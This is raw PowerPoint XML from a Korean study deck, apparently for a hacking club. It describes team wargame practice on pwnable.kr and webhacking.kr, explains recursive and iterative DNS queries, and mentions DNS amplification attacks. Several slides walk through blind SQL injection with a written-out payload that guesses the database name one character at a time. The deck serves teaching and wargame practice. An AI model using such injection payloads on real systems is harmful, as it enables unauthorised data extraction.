                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>: Team Red : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
                        <a:t>시스탬</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t> 해킹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
                        <a:t>포너</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부반장 팀 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>: Team Blue : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>웹 해킹 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
                        <a:t>웹해커</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3"/>
                        </a:rPr>
                        <a:t>http://pwnable.kr/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t> 1~5</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>번</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>문제당 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>100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4"/>
                        </a:rPr>
                        <a:t>https://webhacking.kr/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>  1~ 10</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>번 문제당 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>50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err="1"/>
                        <a:t>HackerSchoolFTZ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>  1 ~ 15</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>번</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>문제당 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>30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각 팀별로 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
                        <a:t>그주간</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t> 풀이를 발표</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>. </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발표가 끝나면</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
                        <a:t>상대편에서 질문</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3994274314"/>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5"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539865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1507253" y="1690688"/>
            <a:ext cx="3926187"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 and if((select substring(database(),2,1)=‘w’) ‘#</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어 있어 여기 계정정보</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRP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61085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성공</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:endParaRP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475396"/>
            <a:chOff x="8860779" y="3123526"/>
            <a:chExt cx="2176757" cy="1212567"/>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969806"/>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 and if((select substring(database(),2,1)=‘w’) ‘#</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242878120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A94688FE-5C28-44F0-BF37-77A457C55AFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3535136" y="2588080"/>
            <a:ext cx="3290207" cy="669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데이터베이스 이름</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="직사각형 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C0DE0A1-A309-48F8-8C7A-F351DD4A1E1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1249915" y="3257551"/>
            <a:ext cx="8518072" cy="13255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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>? ? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ? ? ? ? ? ? ? ? ? ? ?</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="3600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="직사각형 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F39D8318-F7CE-4079-B202-FA5B84A5473B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2299607" y="5162099"/>
            <a:ext cx="7007679" cy="987878"/>
          </a:xfrm>
          <a:prstGeom prst="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 b c d e f g h I j k l m n o p q r s t u v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> x y z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A B C D E F G H I J K L M N O P Q R S T U V X Y Z</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>~ ! @ # $ % ^ &amp; * ( ) _ + |</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="직사각형 43">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96E2118B-6704-463B-B8B7-0F69FFF0A488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1053192" y="5162099"/>
            <a:ext cx="1246415" cy="987878"/>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후보들</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="직사각형 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C9A845F-AEBA-4518-9D50-63B2DC0E334E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3673929" y="3641271"/>
            <a:ext cx="310242" cy="604158"/>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 name="직선 화살표 연결선 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A6E394E-B778-4178-96BF-A7240F92CD7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3829050" y="4245429"/>
            <a:ext cx="16329" cy="916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418C502-F141-43A6-9138-6A3250BB1610}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838199" y="2052349"/>
            <a:ext cx="3755571" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>IF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 로그인이 되지 않았음 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="TextBox 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94FDD01E-D46E-444F-80C6-FC155438D216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6975022" y="4792767"/>
            <a:ext cx="1303566" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>후보 제외</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="TextBox 45">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F64BD28-E9FA-483B-BA28-5B7B5945E63F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6096000" y="6315417"/>
            <a:ext cx="5091794" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>반복실행하면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>데이터베이스 이름 획득 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301065453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증폭 공격</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>(DNS Amplification)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Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97C31125-175B-41E5-8957-CB9F98BCE6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1493995"/>
            <a:ext cx="7620000" cy="523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80214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재귀 쿼리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8" name="Picture 4" descr="컴퓨터 네트워크 39장 - 도메인 네임 스페이스(Domain Name Space) -">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAD8057E-801F-454D-A530-487AB48CD0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1920" y="1690688"/>
            <a:ext cx="4955337" cy="48260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컴퓨터 네트워크 39장 - 도메인 네임 스페이스(Domain Name Space) -">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AAD7A59-7C0F-45EF-A52D-0320F360C0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5492" y="1603603"/>
            <a:ext cx="2133600" cy="45815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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="32" name="직선 화살표 연결선 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16D7BF03-1954-41FB-BC68-333CB91F4D04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3494314" y="5641521"/>
            <a:ext cx="4661807" cy="3184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B360F30F-233E-4C66-A2E9-1DC5DAF274B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10665277" y="5431393"/>
            <a:ext cx="862693" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>level 4</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="50" name="TextBox 49">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41E78D56-A556-40ED-94A9-8E6AF5628F97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10646226" y="2400737"/>
            <a:ext cx="862693" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>level 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=TLD</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="TextBox 50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2956B1B1-97A5-4074-8369-8F55114373D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10646226" y="3342939"/>
            <a:ext cx="862693" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>level 2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>=SLD</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31B9C85E-2B90-4EEF-9394-E6A07A429C86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10646227" y="4403449"/>
            <a:ext cx="862693" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>level 3</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="367353818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재귀 쿼리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32" name="Picture 12" descr="반복적 질의 2단계">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAD7032C-1F53-41D9-8AE1-9E4411349A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5077" y="2000251"/>
            <a:ext cx="7597443" cy="363923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직선 화살표 연결선 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{041FED53-C3A7-4ACA-B94B-70E1138E1585}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7837714" y="3780064"/>
            <a:ext cx="816429" cy="32657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5" name="직사각형 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93315E3D-1D4F-4C71-93C2-A47D7EFD3D3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7519307" y="3665764"/>
            <a:ext cx="318407"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03660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DNS - 여러분이 google.com을 칠 때 - 웹 부트캠퍼를 위한 컴퓨터 과학">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAAADBC9-C6B3-446A-A5DD-BD78602687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5077" y="2000250"/>
            <a:ext cx="7597443" cy="3639233"/>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재귀 쿼리</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2" name="직선 화살표 연결선 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{313132D2-2E2B-417B-AFD8-B676EE519230}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7862207" y="4212771"/>
            <a:ext cx="767443" cy="115932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FD9A8404-3F1E-449B-8198-C73D4CF6F2DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7543800" y="4098471"/>
            <a:ext cx="318407"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4972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반복적 질의 4단계">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89F58ABF-06D0-48AA-AD87-E74396685D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5077" y="2008413"/>
            <a:ext cx="7567294" cy="3639233"/>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재귀 쿼리</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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{755D36D2-9494-4109-B0F8-75A9BCB82EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1836571" y="5760534"/>
            <a:ext cx="8238158" cy="646331"/>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DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>서버는 재귀적 질의와 반복적 질의 두가지의 시스템이 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>예시는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>재귀적 질의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>시스템 이다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="398387796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쿼리의 타입</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6" name="그림 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8264202-C8A2-4E1E-BEB8-2ABF183551AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1814235" y="1764674"/>
            <a:ext cx="7688993" cy="3328652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="그림 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97CF69EE-3687-4A7C-859E-B4395462B98F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1751240" y="5033283"/>
            <a:ext cx="7677150" cy="1085850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="그림 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFCABF6F-B4BF-45D9-948C-4B9E6B2D720E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
